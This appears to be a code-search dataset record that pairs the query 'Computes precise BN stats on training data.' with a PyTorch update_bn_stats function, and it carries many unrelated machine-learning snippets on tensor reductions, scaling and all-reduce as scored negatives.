reduce_sum_d(x, y, axis=None, keepdims=None, kernel_name=\"reduce_sum_d\"):\n\n dtype = x[\"dtype\"]\n dtype_lower = dtype.lower()\n check_list = (\"float16\", \"float32\")\n check_dtype(dtype_lower, check_list, param_name=\"x\")\n\n with te.op.compute():\n shape = x[\"shape\"]\n shape_range = x[\"range\"]\n\n axes = []\n shape_len = len(shape)\n if not axis:\n for i, _ in enumerate(shape):\n axes.append(i)\n else:\n axes = list(axis)\n axes = cce_util.axis_check(shape_len, axes)\n\n shape_new, shape_range_new, axes_new, fused_rel_dic = \\\n fused_reduce_axis(shape, shape_range, axes)\n\n add_compile_info(\"fused_rel_dic\", fused_rel_dic)\n x[\"shape\"] = shape_new\n x[\"range\"] = shape_range_new\n shape_var_new = variable_shape([x])[0]\n\n data_input = tvm.placeholder(shape_var_new, name=\"data_input\",\n dtype=dtype_lower)\n res = reduce_sum_d_compute(data_input, y, axes_new, keepdims)\n\n with tvm.target.cce():\n sch = generic.auto_schedule(res)\n\n # build\n config = {\"name\": kernel_name,\n \"tensor_list\": [data_input, res]}\n te.lang.dynamic.build(sch, config)", "def prod(iterable):\n \n return reduce(operator.mul, iterable, 1)", "def _shrink(values, last_dim, reduction_factor):\n\n shape = tf.shape(values)\n new_shape = [\n shape[0],\n shape[1] // reduction_factor,\n last_dim * reduction_factor\n ]\n values = tf.reshape(values, new_shape)\n return values", "def average(self, tensors, batch_size=None):\n # check the arguments and try the fast path: only one tensor\n tensors = list(tensors)\n if not tensors:\n return []\n length = len(tensors[0])\n if length == 0:\n raise ValueError('`tensors` must be list of non-empty Tensor '\n 'lists.')\n for t in tensors[1:]:\n if len(t) != length:\n raise ValueError('`tensors` must be list of Tensor lists of '\n 'the same length.')\n if length == 1:\n return [t[0] for t in tensors]\n\n # do the slow path: average all tensors\n with tf.device(self.main_device), tf.name_scope('average_tensors'):\n if batch_size is None:\n return [tf.reduce_mean(tf.stack(t), axis=0) 
for t in tensors]\n\n k = len(self.work_devices)\n slice_len = (batch_size + k - 1) // k\n last_slice_size = batch_size - (k - 1) * slice_len\n\n if is_tensor_object(batch_size):\n to_float = tf.to_float\n else:\n to_float = float\n\n float_batch_size = to_float(batch_size)\n weights = tf.stack(\n [to_float(slice_len) / float_batch_size] * (k - 1) +\n [to_float(last_slice_size) / float_batch_size]\n )\n\n return [tf.reduce_sum(tf.stack(t) * weights, axis=0)\n for t in tensors]", "def ol_mpi_allreduce(data, operator: Union[int, str, None] = None):\n import numba_mpi\n\n if operator is None or isinstance(operator, nb.types.NoneType):\n op_id = -1 # value will not be used\n elif isinstance(operator, nb.types.misc.StringLiteral):\n op_id = Operator.id(operator.literal_value)\n elif isinstance(operator, nb.types.misc.Literal):\n op_id = int(operator)\n else:\n raise RuntimeError(\"`operator` must be a literal type\")\n\n @register_jitable\n def _allreduce(sendobj, recvobj, operator: Union[int, str, None] = None) -> int:\n \"\"\"helper function that calls `numba_mpi.allreduce`\"\"\"\n if operator is None:\n return numba_mpi.allreduce(sendobj, recvobj) # type: ignore\n else:\n return numba_mpi.allreduce(sendobj, recvobj, op_id) # type: ignore\n\n if isinstance(data, types.Number):\n\n def impl(data, operator: Union[int, str, None] = None):\n \"\"\"reduce a single number across all cores\"\"\"\n sendobj = np.array([data])\n recvobj = np.empty((1,), sendobj.dtype)\n status = _allreduce(sendobj, recvobj, operator)\n assert status == 0\n return recvobj[0]\n\n elif isinstance(data, types.Array):\n\n def impl(data, operator: Union[int, str, None] = None):\n \"\"\"reduce an array across all cores\"\"\"\n recvobj = np.empty(data.shape, data.dtype)\n status = _allreduce(data, recvobj, operator)\n assert status == 0\n return recvobj\n\n else:\n raise TypeError(f\"Unsupported type {data.__class__.__name__}\")\n\n return impl", "def all_reduce_sum_gradients(grads_and_vars):\n grads_and_vars = list(grads_and_vars)\n filtered_grads_and_vars = filter_empty_gradients(grads_and_vars)\n if filtered_grads_and_vars:\n if strategy_supports_no_merge_call():\n grads = [pair[0] for pair in filtered_grads_and_vars]\n reduced = distribute_lib.get_strategy().extended._replica_ctx_all_reduce( # pylint: disable=protected-access\n ds_reduce_util.ReduceOp.SUM, grads)\n else:\n # TODO(b/183257003): Remove this branch\n reduced = distribute_lib.get_replica_context().merge_call(\n _all_reduce_sum_fn, args=(filtered_grads_and_vars,))\n else:\n reduced = []\n # Copy 'reduced' but add None gradients back in\n reduced_with_nones = []\n reduced_pos = 0\n for g, v in grads_and_vars:\n if g is None:\n reduced_with_nones.append((None, v))\n else:\n reduced_with_nones.append((reduced[reduced_pos], v))\n reduced_pos += 1\n assert reduced_pos == len(reduced), \"Failed to add all gradients\"\n return reduced_with_nones", "def prod(iterable):\n return reduce(operator.mul, iterable, 1)", "def prod(iterable):\n return reduce(operator.mul, iterable, 1)", "def prod(iterable):\n return reduce(operator.mul, iterable, 1)", "def constraint_scaling_transform_undo(c):\n if not isinstance(c, _ConstraintData):\n raise TypeError(f\"{c} is not a constraint or is an indexed constraint\")\n v = get_constraint_transform_applied_scaling_factor(c)\n if v is None:\n return # hasn't been transformed, so nothing to do.\n __scale_constraint(c, 1 / v)\n __unset_constraint_transform_applied_scaling_factor(c)", "def reduce(self, reduce_op, value, axis): # pylint: 
disable=useless-super-delegation\n return super(OneDeviceStrategy, self).reduce(reduce_op, value, axis)", "def scale(self, scale_factor: float) -> None:\n self.tensor[:, :3] *= scale_factor", "def prod(lst):\n return reduce(mul, lst, 1)", "def call(self, inputs, *args, **kwargs):\n batch_dims = inputs.shape[:nest_utils.get_outer_rank(inputs, self._spec)]\n num_batch_elems = tf.reduce_prod(batch_dims)\n transformed_inputs = tf.reshape(inputs, (num_batch_elems, -1))\n result = self._batch(transformed_inputs, *args, **kwargs)\n return tf.reshape(result, inputs.shape)", "def compute_all(self) -> None:\n self.compute_j_matrix()\n self.compute_outter_distribution()\n self.compute_max_prior()\n self.compute_max_poutter()", "def convert_prod(node, **kwargs):\n name, input_nodes, attrs = get_inputs(node, kwargs)\n\n mx_axis = attrs.get(\"axis\", None)\n axes = convert_string_to_list(str(mx_axis)) if mx_axis is not None else None\n\n keepdims = get_boolean_attribute_value(attrs, \"keepdims\")\n\n if axes is not None:\n node = onnx.helper.make_node(\n 'ReduceProd',\n inputs=input_nodes,\n outputs=[name],\n axes=axes,\n keepdims=keepdims,\n name=name\n )\n\n return [node]\n else:\n node = onnx.helper.make_node(\n 'ReduceProd',\n inputs=input_nodes,\n outputs=[name],\n keepdims=keepdims,\n name=name\n )\n\n return [node]", "def sum(x, reduce_instance_dims=True, name=None): # pylint: disable=redefined-builtin\n return _numeric_combine(x, np.sum, reduce_instance_dims, name)", "def allgather(self, tensor, name, shape, dtype, context):\n assert isinstance(tensor, nd.NDArray), type(tensor)\n assert isinstance(name, str), type(name)\n assert isinstance(shape, tuple), type(shape)\n assert isinstance(dtype, str), type(dtype)\n assert isinstance(context, mx.context.Context), type(context)\n total_tensor = self.get_ndarray(context=context,\n name=name,\n shape=shape,\n dtype=dtype)\n total_tensor[:] = 0 # reset array before all-reduce is very important\n total_tensor[self.rank * self.batch_size:self.rank * self.batch_size +\n self.batch_size] = tensor\n hvd.allreduce_(total_tensor, average=False) # all-reduce in-place\n return total_tensor", "def _transform_inputs(self, inputs):\n\n if self.input_transform == 'resize_concat':\n inputs = [inputs[i] for i in self.in_index]\n upsampled_inputs = [\n resize(\n input=x,\n size=inputs[0].shape[2:],\n mode='bilinear',\n align_corners=self.align_corners) for x in inputs\n ]\n inputs = torch.cat(upsampled_inputs, dim=1)\n elif self.input_transform == 'multiple_select':\n inputs = [inputs[i] for i in self.in_index]\n else:\n inputs = inputs[self.in_index]\n\n return inputs", "def apply(self, event: Event, state: State, logger: Optional[Logger] = None) -> None:\n input, target = state.batch_pair\n assert isinstance(input, Tensor) and isinstance(target, Tensor), \\\n \"Multiple tensors not supported for this method yet.\"\n\n # Calculate the current size of the inputs to use\n initial_size = self.hparams.initial_scale\n finetune_fraction = self.hparams.finetune_fraction\n scale_frac_elapsed = min([(state.epoch / state.max_epochs) / (1 - finetune_fraction), 1])\n\n # Linearly increase to full size at the start of the fine tuning period\n scale_factor = initial_size + (1 - initial_size) * scale_frac_elapsed\n\n new_input, new_target = resize_inputs(X=input,\n y=target,\n scale_factor=scale_factor,\n mode=self.hparams.mode,\n resize_targets=self.hparams.resize_targets)\n state.batch = (new_input, new_target)", "def aggregate(all_metrics, reducer, suffix):\n # Collect metric 
separately\n separated_metrics = {} # type: dict[frozenset, list[dict]]\n for el in all_metrics:\n key = frozenset(el[\"metric\"][\"dimensions\"].items())\n if key not in separated_metrics:\n separated_metrics[key] = [el]\n else:\n separated_metrics[key].append(el)\n\n # Collect all dimensions\n dims = {}\n for metric_dims in separated_metrics.keys():\n for prop, val in dict(metric_dims).iteritems():\n if prop in dims:\n dims[prop].add(val)\n else:\n dims[prop] = set(val)\n\n # Sort each metric\n for _, metric in separated_metrics.iteritems():\n metric.sort(key=lambda v: v[\"metric\"][\"timestamp\"])\n\n separated_metrics = sorted(separated_metrics.values(), key=len)\n separated_metrics.reverse()\n\n # Compute the new values\n new_values = []\n all_timestamps = map(\n lambda l: map(\n lambda x: x[\"metric\"][\"timestamp\"], l),\n separated_metrics)\n metric_count = len(separated_metrics)\n for index in range(0, len(separated_metrics[0])):\n new_value = reducer[0](\n separated_metrics[0][index][\"metric\"][\"value\"],\n metric_count)\n new_timestamp = separated_metrics[0][index][\"metric\"][\"timestamp\"]\n for metric_index in range(1, metric_count):\n new_value = reducer[1](new_value, helpers.interpolate(\n new_timestamp,\n separated_metrics[metric_index],\n all_timestamps[metric_index]\n ), metric_count)\n new_values.append((new_timestamp, new_value))\n\n # Aggregate the other details:\n metric_name = separated_metrics[0][0][\"metric\"][\"name\"] + suffix\n meta = separated_metrics[0][0][\"meta\"]\n new_metrics = [\n helpers.create_agg_metric(\n metric_name,\n meta,\n dims,\n val[0],\n val[1]\n ) for val in new_values\n ]\n return new_metrics", "def preprocess(\n self,\n images: ImageInput,\n do_resize: bool = None,\n size: Dict[str, int] = None,\n resample: PILImageResampling = None,\n do_normalize: bool = None,\n do_color_quantize: Optional[bool] = None,\n clusters: Optional[Union[List[List[int]], np.ndarray]] = None,\n return_tensors: Optional[Union[str, TensorType]] = None,\n data_format: Optional[Union[str, ChannelDimension]] = ChannelDimension.FIRST,\n input_data_format: Optional[Union[str, ChannelDimension]] = None,\n **kwargs,\n ) -> PIL.Image.Image:\n do_resize = do_resize if do_resize is not None else self.do_resize\n size = size if size is not None else self.size\n size = get_size_dict(size)\n resample = resample if resample is not None else self.resample\n do_normalize = do_normalize if do_normalize is not None else self.do_normalize\n do_color_quantize = do_color_quantize if do_color_quantize is not None else self.do_color_quantize\n clusters = clusters if clusters is not None else self.clusters\n clusters = np.array(clusters)\n\n images = make_list_of_images(images)\n\n if not valid_images(images):\n raise ValueError(\n \"Invalid image type. Must be of type PIL.Image.Image, numpy.ndarray, \"\n \"torch.Tensor, tf.Tensor or jax.ndarray.\"\n )\n\n if do_resize and size is None or resample is None:\n raise ValueError(\"Size and resample must be specified if do_resize is True.\")\n\n if do_color_quantize and clusters is None:\n raise ValueError(\"Clusters must be specified if do_color_quantize is True.\")\n\n # All transformations expect numpy arrays.\n images = [to_numpy_array(image) for image in images]\n\n if is_scaled_image(images[0]) and do_normalize:\n logger.warning_once(\n \"It looks like you are trying to rescale already rescaled images. 
If you wish to do this, \"\n \"make sure to set `do_normalize` to `False` and that pixel values are between [-1, 1].\",\n )\n\n if input_data_format is None:\n # We assume that all images have the same channel dimension format.\n input_data_format = infer_channel_dimension_format(images[0])\n\n if do_resize:\n images = [\n self.resize(image=image, size=size, resample=resample, input_data_format=input_data_format)\n for image in images\n ]\n\n if do_normalize:\n images = [self.normalize(image=image, input_data_format=input_data_format) for image in images]\n\n if do_color_quantize:\n images = [to_channel_dimension_format(image, ChannelDimension.LAST, input_data_format) for image in images]\n # color quantize from (batch_size, height, width, 3) to (batch_size, height, width)\n images = np.array(images)\n images = color_quantize(images, clusters).reshape(images.shape[:-1])\n\n # flatten to (batch_size, height*width)\n batch_size = images.shape[0]\n images = images.reshape(batch_size, -1)\n\n # We need to convert back to a list of images to keep consistent behaviour across processors.\n images = list(images)\n else:\n images = [\n to_channel_dimension_format(image, data_format, input_channel_dim=input_data_format)\n for image in images\n ]\n\n data = {\"input_ids\": images}\n return BatchFeature(data=data, tensor_type=return_tensors)", "def force_rescale(self,rescaleFactor):\n if not self.built:\n raise Exception(\"model should be built before calling this function\")\n for l in self.layerList:\n l.rescale(rescaleFactor)\n self.rescaleFactor.assign(rescaleFactor)", "def map_flat_values(op, *args, **kwargs):\n # Replace RaggedTensors with their values; and collect the partitions tensors\n # from each RaggedTensor.\n partition_lists = []\n flat_values_nrows = []\n inner_args = _replace_ragged_with_flat_values(args, partition_lists,\n flat_values_nrows)\n inner_kwargs = _replace_ragged_with_flat_values(kwargs, partition_lists,\n flat_values_nrows)\n if not partition_lists:\n return op(*args, **kwargs)\n\n # If we can statically determine that the inputs are incompatible, then raise\n # an error. (We can't guarantee full compatibility statically, so we need to\n # perform some runtime checks too; but this allows us to fail sooner in some\n # cases.)\n if flat_values_nrows:\n flat_values_nrows = set(flat_values_nrows)\n if len(flat_values_nrows) != 1:\n raise ValueError(\"Input RaggedTensors' flat_values must all have the \"\n \"same outer-dimension size. Got sizes: %s\" %\n flat_values_nrows)\n flat_values_nrows = flat_values_nrows.pop() # Get the single element\n else:\n flat_values_nrows = None\n\n partition_dtypes = set(p[0].dtype for p in partition_lists)\n if len(partition_dtypes) > 1:\n if not ragged_config.auto_cast_partition_dtype():\n raise ValueError(\"Input RaggedTensors have mismatched row partition \"\n \"dtypes; use RaggedTensor.with_row_splits_dtype() to \"\n \"convert them to compatible dtypes.\")\n\n partition_lists = [\n [p.with_dtype(dtypes.int64)\n for p in partition_list] # pylint: disable=g-complex-comprehension\n for partition_list in partition_lists\n ]\n\n # Delegate to `op`\n op_output = op(*inner_args, **inner_kwargs)\n # Check that the result has the expected shape (if known).\n if flat_values_nrows is not None:\n if not op_output.shape[:1].is_compatible_with([flat_values_nrows]):\n raise ValueError(\n \"tf.ragged.map_flat_values requires that the output of `op` have \"\n \"the same outer-dimension size as flat_values of any ragged \"\n \"inputs. 
(output shape: %s; expected outer dimension size: %s)\" %\n (op_output.shape, flat_values_nrows))\n # Compose the result from the transformed values and the partitions.\n return ragged_tensor.RaggedTensor._from_nested_row_partitions( # pylint: disable=protected-access\n op_output,\n _merge_partition_lists(partition_lists),\n validate=False)", "def squash(vectors, axis=-1):\n s_squared_norm = K.sum(K.square(vectors), axis, keepdims=True)\n scale = s_squared_norm / (1 + s_squared_norm) / K.sqrt(s_squared_norm + K.epsilon())\n return scale * vectors", "def with_sum_sum_reduction(self):\n return self.with_reduction(lambda x: x.sum())", "def reduce_run():", "def _transform_inputs(self, inputs):\n if not isinstance(inputs, list):\n return inputs\n if self.input_transform == 'resize_concat':\n inputs = [inputs[i] for i in self.in_index]\n upsampled_inputs = [resize(input=x, size=inputs[0].shape[2:], mode='bilinear', align_corners=self.align_corners) for x in inputs]\n inputs = torch.cat(upsampled_inputs, dim=1)\n elif self.input_transform == 'multiple_select':\n inputs = [inputs[i] for i in self.in_index]\n else:\n inputs = inputs[self.in_index]\n return inputs", "def _transform_inputs(self, inputs):\n if not isinstance(inputs, list):\n return inputs\n if self.input_transform == 'resize_concat':\n inputs = [inputs[i] for i in self.in_index]\n upsampled_inputs = [resize(input=x, size=inputs[0].shape[2:], mode='bilinear', align_corners=self.align_corners) for x in inputs]\n inputs = torch.cat(upsampled_inputs, dim=1)\n elif self.input_transform == 'multiple_select':\n inputs = [inputs[i] for i in self.in_index]\n else:\n inputs = inputs[self.in_index]\n return inputs", "def _transform_inputs(self, inputs):\n if not isinstance(inputs, list):\n return inputs\n if self.input_transform == 'resize_concat':\n inputs = [inputs[i] for i in self.in_index]\n upsampled_inputs = [resize(input=x, size=inputs[0].shape[2:], mode='bilinear', align_corners=self.align_corners) for x in inputs]\n inputs = torch.cat(upsampled_inputs, dim=1)\n elif self.input_transform == 'multiple_select':\n inputs = [inputs[i] for i in self.in_index]\n else:\n inputs = inputs[self.in_index]\n return inputs", "def scalar_mul(x, s, pub):\n x_shape = x.shape\n x_flatten = np.flatten(x)\n s_array = np.array([s for _ in range(len(x_flatten))])\n \n res = paillier_gpu.mul_impl(x_flatten, s_array)\n\n return np.reshape(res, x_shape)", "def compute_moments(\n inputs: JTensor,\n padding: JTensor,\n reduce_over_dims: List[int],\n enable_cross_replica_sum_on_tpu: bool = False,\n keepdims: bool = False,\n) -> Tuple[JTensor, JTensor]:\n assert inputs.ndim == padding.ndim\n rank = inputs.ndim\n assert all([0 <= dim < rank for dim in reduce_over_dims])\n mask = 1.0 - padding\n sum_v = jnp.sum(inputs * mask, axis=reduce_over_dims, keepdims=keepdims)\n count_v = jnp.sum(\n jnp.ones_like(inputs) * mask, axis=reduce_over_dims, keepdims=keepdims)\n\n if enable_cross_replica_sum_on_tpu:\n # TODO(shafey, yonghui): Fetch axis_name from globals.\n sum_v = jax.lax.psum(sum_v, axis_name='batch')\n count_v = jax.lax.psum(count_v, axis_name='batch')\n\n count_v = jnp.maximum(count_v, 1.0)\n mean = sum_v / count_v\n sum_vv = jnp.sum(\n (inputs - mean) * (inputs - mean) * mask,\n axis=reduce_over_dims,\n keepdims=keepdims)\n\n if enable_cross_replica_sum_on_tpu:\n # TODO(shafey, yonghui): Fetch axis_name from globals.\n sum_vv = jax.lax.psum(sum_vv, axis_name='batch')\n\n variance = sum_vv / count_v\n return mean, variance", "def scale_vectors(vectors, f):\n 
return [scale_vector(vector, f) for vector in vectors]", "def _apply(self, x, **kwargs):\n return reduce(lambda x_i, tr: tr._apply(x_i), self.transforms, x)", "def _numeric_combine(x, fn, reduce_instance_dims=True, name=None):\n if not isinstance(x, tf.Tensor):\n raise TypeError('Expected a Tensor, but got %r' % x)\n\n if reduce_instance_dims:\n # If reducing over all dimensions, result is scalar.\n shape = ()\n elif x.shape.dims is not None:\n # If reducing over batch dimensions, with known shape, the result will be\n # the same shape as the input, but without the batch.\n shape = x.shape.as_list()[1:]\n else:\n # If reducing over batch dimensions, with unknown shape, the result will\n # also have unknown shape.\n shape = None\n return combine_analyzer(\n x, x.dtype, shape, _NumPyCombinerSpec(fn, reduce_instance_dims),\n name if name is not None else fn.__name__)", "def fold_all_batch_norms_to_scale(\n sim: QuantizationSimModel,\n) -> List[Tuple[QcQuantizeWrapper, QcQuantizeWrapper]]:\n # pylint: disable=protected-access\n assert sim.model is not None\n assert sim.connected_graph is not None\n\n model = sim.model\n connected_graph = sim.connected_graph\n\n quant_wrappers = {\n quant_wrapper._module_to_wrap: quant_wrapper\n for _, quant_wrapper in sim.quant_wrappers()\n }\n conv_bn_pairs, bn_conv_pairs, _ = _find_all_batch_norms_to_fold(connected_graph)\n conv_bn_pairs = [\n (quant_wrappers[conv], quant_wrappers[bn]) for conv, bn in conv_bn_pairs\n ]\n bn_conv_pairs = [\n (quant_wrappers[bn], quant_wrappers[conv]) for bn, conv in bn_conv_pairs\n ]\n\n _fold_given_batch_norms(model, conv_bn_pairs, bn_conv_pairs)\n\n return conv_bn_pairs + [(conv, bn) for bn, conv in bn_conv_pairs]", "def __normalizeData__(self,tensors = None):\n if(tensors is None):\n tensors = self.__tensors__\n new_tensors=[]\n for tensor in tensors:\n new_tensors.append( [ [1/(1+x) for x in tensor[0] ] , tensor[1],tensor[2],tensor[3] ])\n return new_tensors", "def all(tensor):\n raise NotImplementedError", "def compute_mul(tree):\r\n neg, inputs = tree\r\n if inputs is None:\r\n raise AssertionError(\r\n 'Function `compute_mul` found a missing leaf, did you forget to '\r\n 'call `simplify_mul` on the tree first?')\r\n elif isinstance(inputs, list):\r\n # Recurse through inputs.\r\n rval = tensor.mul(*map(compute_mul, inputs))\r\n else:\r\n rval = inputs\r\n if neg:\r\n rval = -rval\r\n return rval", "def transform_images(img, size):\n return tf.image.resize(img, (size, size)) / 255", "def Reduce(\n self,\n sendbuf: Union[DNDarray, torch.Tensor, Any],\n recvbuf: Union[DNDarray, torch.Tensor, Any],\n op: MPI.Op = MPI.SUM,\n root: int = 0,\n ):\n ret, sbuf, rbuf, buf = self.__reduce_like(self.handle.Reduce, sendbuf, recvbuf, op, root)\n if buf is not None and isinstance(buf, torch.Tensor) and buf.is_cuda and not CUDA_AWARE_MPI:\n buf.copy_(rbuf)\n return ret", "def apply_all_accumulators(self):\n self._require_state(\"APPLYING\")\n for mi in self._accums.keys():\n self._apply_one_accum_set(mi)", "def scale(requestContext, seriesList, factor):\n for series in seriesList:\n series.name = \"scale(%s,%g)\" % (series.name,float(factor))\n series.pathExpression = series.name\n for i,value in enumerate(series):\n series[i] = safeMul(value,factor)\n return seriesList", "def take_optimizer_step(self, overflow_buf):\n if self.allreduce_post_accumulation:\n # manually allreduce gradients after all accumulation steps\n # check for Inf/NaN\n # 1. 
allocate an uninitialized buffer for flattened gradient\n scaler = _amp_state.loss_scalers[0]\n master_grads = [\n p.grad\n for p in amp.master_params(self.optimizer)\n if p.grad is not None\n ]\n flat_grad_size = sum(p.numel() for p in master_grads)\n allreduce_dtype = \\\n torch.float16 \\\n if self.allreduce_post_accumulation_fp16 \\\n else torch.float32\n flat_raw = torch.empty(\n flat_grad_size,\n device='cuda', dtype=allreduce_dtype)\n # 2. combine unflattening and predivision of unscaled 'raw' gradient\n allreduced_views = apex_C.unflatten(flat_raw, master_grads)\n overflow_buf.zero_()\n amp_C.multi_tensor_scale(\n 65536,\n overflow_buf,\n [master_grads, allreduced_views],\n scaler.loss_scale() /\n (torch.distributed.get_world_size()\n * self.num_accumulation_steps)\n )\n # 3. sum gradient across ranks. Because of the predivision, this averages the gradient\n torch.distributed.all_reduce(flat_raw)\n # 4. combine unscaling and unflattening of allreduced gradient\n overflow_buf.zero_()\n amp_C.multi_tensor_scale(\n 65536,\n overflow_buf,\n [allreduced_views, master_grads],\n 1./scaler.loss_scale()\n )\n # 5. update loss scale\n scaler = _amp_state.loss_scalers[0]\n old_overflow_buf = scaler._overflow_buf\n scaler._overflow_buf = overflow_buf\n had_overflow = scaler.update_scale()\n scaler._overfloat_buf = old_overflow_buf\n # 6. call optimizer step function\n if had_overflow == 0:\n self.optimizer.step()\n self.global_step += 1\n else:\n # Overflow detected, print message and clear gradients\n if self.is_main_process:\n logging.info(\n f\"Rank {torch.distributed.get_rank()} \"\n \":: Gradient overflow. Skipping step, \"\n f\"reducing loss scale to {scaler.loss_scale()}\"\n )\n if _amp_state.opt_properties.master_weights:\n for param in self.optimizer._amp_stash.all_fp32_from_fp16_params:\n param.grad = None\n for param in self.model.parameters():\n param.grad = None\n else:\n self.optimizer.step()\n # NOTE: This basically does: optimizer.zero_grad()\n for param in self.model.parameters():\n param.grad = None\n self.global_step += 1", "def process_sum_square( fids, ndim=2 ):\n\t\n\timg = process( fids, ndim)\n\timg *= np.conj(img) \n\t\n\treturn np.squeeze(np.sqrt( np.sum( np.abs(img), axis=0) ))" ]
[ "0.6388613", "0.60503924", "0.5885183", "0.5827911", "0.5778461", "0.55323684", "0.5511012", "0.5458916", "0.54437757", "0.5417451", "0.5380227", "0.5299009", "0.5289442", "0.52552223", "0.52131027", "0.5203694", "0.5203694", "0.5196382", "0.515265", "0.5149693", "0.5122873", "0.51203275", "0.51118934", "0.5109616", "0.5050525", "0.50342965", "0.5028793", "0.5004616", "0.50027287", "0.49855158", "0.4985236", "0.49829802", "0.49790654", "0.4974818", "0.4959414", "0.49566516", "0.49463505", "0.49161056", "0.49125937", "0.49042574", "0.4902869", "0.4899781", "0.48981085", "0.48954192", "0.48935", "0.48927975", "0.48737216", "0.4870325", "0.48667923", "0.48664367", "0.4866092", "0.4856836", "0.4850504", "0.48502418", "0.48476207", "0.48373717", "0.48364425", "0.48342925", "0.48316506", "0.48241806", "0.4816289", "0.4815341", "0.4815341", "0.4815341", "0.47909927", "0.47882506", "0.4779059", "0.4775221", "0.47751704", "0.47711754", "0.47627273", "0.47587645", "0.47514844", "0.47484332", "0.47291458", "0.4722746", "0.47153443", "0.4712209", "0.47071505", "0.4702384", "0.46963832", "0.46963212", "0.46912846", "0.46912846", "0.46912846", "0.4690933", "0.4680334", "0.46789655", "0.4675045", "0.4666198", "0.4662403", "0.46573398", "0.46378502", "0.4631076", "0.46306804", "0.46258628", "0.46258062", "0.46250442", "0.46219945", "0.46184945" ]
0.8066509
0
Computes precise BN stats on training data.
def update_bn_stats( model: nn.Module, loader: DataLoader, num_samples: int = 8192, logger: Optional[Union[logging.Logger, str]] = None) -> None: if is_model_wrapper(model): model = model.module # get dist info rank, world_size = mmengine.dist.get_dist_info() # Compute the number of mini-batches to use, if the size of dataloader is # less than num_iters, use all the samples in dataloader. num_iter = num_samples // (loader.batch_size * world_size) num_iter = min(num_iter, len(loader)) # Retrieve the BN layers bn_layers = [ m for m in model.modules() if m.training and isinstance(m, (_BatchNorm)) ] if len(bn_layers) == 0: print_log('No BN found in model', logger=logger, level=logging.WARNING) return print_log( f'{len(bn_layers)} BN found, run {num_iter} iters...', logger=logger) # Finds all the other norm layers with training=True. other_norm_layers = [ m for m in model.modules() if m.training and isinstance(m, (_InstanceNorm, GroupNorm)) ] if len(other_norm_layers) > 0: print_log( 'IN/GN stats will not be updated in PreciseHook.', logger=logger, level=logging.INFO) # Initialize BN stats storage for computing # mean(mean(batch)) and mean(var(batch)) running_means = [torch.zeros_like(bn.running_mean) for bn in bn_layers] running_vars = [torch.zeros_like(bn.running_var) for bn in bn_layers] # Remember momentum values momentums = [bn.momentum for bn in bn_layers] # Set momentum to 1.0 to compute BN stats that reflect the current batch for bn in bn_layers: bn.momentum = 1.0 # Average the BN stats for each BN layer over the batches if rank == 0: prog_bar = ProgressBar(num_iter) for data in itertools.islice(loader, num_iter): data = model.data_preprocessor(data, False) model(**data) for i, bn in enumerate(bn_layers): running_means[i] += bn.running_mean / num_iter running_vars[i] += bn.running_var / num_iter if rank == 0: prog_bar.update() # Sync BN stats across GPUs (no reduction if 1 GPU used) running_means = scaled_all_reduce(running_means, world_size) running_vars = scaled_all_reduce(running_vars, world_size) # Set BN stats and restore original momentum values for i, bn in enumerate(bn_layers): bn.running_mean = running_means[i] bn.running_var = running_vars[i] bn.momentum = momentums[i]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def compute_precise_bn_stats(model, loader):\n # Compute the number of minibatches to use\n num_iter = min(cfg.BN.NUM_SAMPLES_PRECISE // loader.batch_size, len(loader))\n # Retrieve the BN layers\n bns = [m for m in model.modules() if isinstance(m, torch.nn.BatchNorm2d)]\n # Initialize stats storage\n mus = [torch.zeros_like(bn.running_mean) for bn in bns]\n sqs = [torch.zeros_like(bn.running_var) for bn in bns]\n # Remember momentum values\n moms = [bn.momentum for bn in bns]\n # Disable momentum\n for bn in bns:\n bn.momentum = 1.0\n # Accumulate the stats across the data samples\n for inputs, _labels in itertools.islice(loader, num_iter):\n model(inputs.cuda())\n # Accumulate the stats for each BN layer\n for i, bn in enumerate(bns):\n m, v = bn.running_mean, bn.running_var\n sqs[i] += (v + m * m) / num_iter\n mus[i] += m / num_iter\n # Set the stats and restore momentum values\n for i, bn in enumerate(bns):\n bn.running_var = sqs[i] - mus[i] * mus[i]\n bn.running_mean = mus[i]\n bn.momentum = moms[i]", "def compute_training_stats():\n means, stds = [], []\n data = SUNRGBDTrainDataset(True)\n for i in range(len(data)):\n print(i)\n img, _ = data[i]\n std, mean = t.std_mean(input=img, dim=(1, 2))\n means.append(mean)\n stds.append(std)\n means = t.sum(t.vstack(means), dim=0) / len(means)\n stds = t.sum(t.vstack(stds), dim=0) / len(stds)\n print(means, stds)", "def test_Gaussian_NB_estimators():", "def get_training_stats(mlp, dset, nepochs, batch_size):\n train, val, test = dset\n trainx, trainy = train\n valx, valy = val\n testx, testy = test\n\n idxs = np.arange(len(trainx))\n\n training_losses = []\n training_errors = []\n validation_losses = []\n validation_errors = []\n test_losses = []\n test_errors = []\n training_losses_stats = []\n training_errors_stats = []\n validation_losses_stats = []\n validation_errors_stats = []\n\n np.random.seed(123)\n model = mlp\n model.train()\n\n for e in range(nepochs):\n\n # Per epoch setup ...\n seed = np.random.randint(123)\n np.random.seed(seed)\n np.random.shuffle(trainx)\n np.random.seed(seed)\n np.random.shuffle(trainy)\n\n seed = np.random.randint(123)\n np.random.seed(seed)\n np.random.shuffle(valx)\n np.random.seed(seed)\n np.random.shuffle(valy)\n\n model.train()\n\n for b in range(0, len(trainx), batch_size):\n\n # Train ...\n x_batch = trainx[b:b + batch_size]\n y_batch = trainy[b:b + batch_size]\n\n model.zero_grads()\n preds = model.forward(x_batch)\n model.backward(y_batch)\n loss = model.y_loss_criterion\n model.step()\n\n answers = np.argmax(preds, axis=1)\n labels = np.argmax(y_batch, axis=1)\n error = (answers[answers!=labels]).shape[0] / len(answers)\n\n training_losses_stats.append(loss)\n training_errors_stats.append(error)\n\n for b in range(0, len(valx), batch_size):\n\n # Evaluate/Validate ...\n model.eval()\n\n x_batch = valx[b:b + batch_size]\n y_batch = valy[b:b + batch_size]\n\n model.zero_grads()\n preds = model.forward(x_batch)\n #print(\"preds shape = \", preds.shape, \", y_batch shape = \", y_batch.shape)\n loss = model.criterion(preds, y_batch)\n\n answers = np.argmax(preds, axis=1)\n labels = np.argmax(y_batch, axis=0)\n error = float(len(answers[answers!=labels])) / len(answers)\n\n validation_losses_stats.append(loss)\n validation_errors_stats.append(error) \n\n\n # Accumulate data...\n training_losses.append(np.mean(training_losses_stats))\n training_errors.append(np.mean(training_errors_stats))\n\n validation_losses.append(np.mean(validation_losses_stats))\n 
